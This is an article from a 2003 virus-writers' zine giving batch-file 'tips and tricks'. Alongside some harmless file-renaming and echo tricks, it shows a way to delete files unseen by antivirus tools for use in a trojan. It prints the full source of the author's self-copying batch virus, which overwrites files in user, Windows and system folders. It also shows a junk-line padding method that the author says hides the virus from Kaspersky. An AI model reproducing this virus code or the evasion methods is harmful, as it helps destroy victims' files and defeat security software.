
                                         +-=-=-=-=-=-=-=-=-+
   .:Tips and tricks in batch part I:.   |  BATch Zone #2  |
     ```````````````````````````````     +-=-=-=-=-=-=-=-=-+

        .:writen by DvL:.
          `````````````
1. Create long filenames in windows
   ````````````````````````````````

 Have you ever wanted to rename your file from batch and pass the 8.3
 limit ? Here`s a way you can do it:

 Example    @ren filename.ext "put the new name here.ext"
 ```````
 Note -> You must leave the quotes if u want the process to take effect.
 ````

2. Put echo in echo in echo
   ````````````````````````

 Have you ever wanted to create a batch that must to drop a file and
 this the dropped file to drop another file ? Here`s a way you can do it:

 Example    @echo"@echo.@echo your text in here ...>test1.txt">test2.txt
 ```````
 Note -> You must leave the quotes if u want the process to take effect.
 ````

3. Another way to delete files
   ```````````````````````````

 Have you ever wanted to delete files from your new batch trojan and to be
 undetected by some super AV`z ? Here`s a way you can do it:

 Example[s]  a) @copy nul x:\filename.ext
 ``````````  b) @move nul x:\filename.ext

 Note -> You can delete only one file per command. You can`t do:
 ````    @copy nul x:\*.* b-coze it doesn`t work [i`ve tried].


4. Another way to hide your trojan from beeing detected
   ````````````````````````````````````````````````````
 
 If your new trojan is coded, but the AV is detecting it you can use this
 tehnique that will help hiding your lines and fool the AV from detecting
 the right tokens.

 Example
 ```````

  - Let's take an silly example from 1 virii of mine .: BAT.CopyToAll.a :.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ctty nul
@echo off
@ver|date>date.txt
@find "13" date.txt|if errorlevel 0 goto time|if not errorlevel 1 goto do
:time
@ver|time>time.txt
@find "13" time.txt|if errorlevel 0 goto done|if not errorlevel 1 goto do
:do
@for %%g in (*.* ..\*.* c:\mydocu~1\*.* %windir%\*.* %path%\*.* c:\*.* %windir%\system\*.*) do copy %0 %%g
:done
ctty con
cls
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
  - Now, let's use this tehnique to see what KAV will see:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
ctty nul
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
@echo off
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
@ver|date>date.txt
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
@find "13" date.txt|if errorlevel 0 goto time|if not errorlevel 1 goto do
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
:time
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
@ver|time>time.txt
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
@find "13" time.txt|if errorlevel 0 goto done|if not errorlevel 1 goto do
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
:do
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
@for %%g in (*.* ..\*.* c:\mydocu~1\*.* %windir%\*.* %path%\*.* c:\*.* %windir%\system\*.*) do copy %0 %%g
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
:done
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
ctty con
01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
cls
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  - KAV didn`t detected nothing. [yet]

 This tehnique works only if u have more than 1 line in your batch virus.

 Note -> Manyer fake bytes will send u to a better hiding of your virus.
 ````    Use this tehnique after every line u have and enjoy `;]


                                         +-=-=-=-=-=-=-=-=-+
   .:Tips and tricks in batch part I:.   |  BATch Zone #2  |
     ```````````````````````````````     +-=-=-=-=-=-=-=-=-+

        .:writen by DvL:.
          `````````````
   
   .: 30.06.2003 :. Romania, DvL

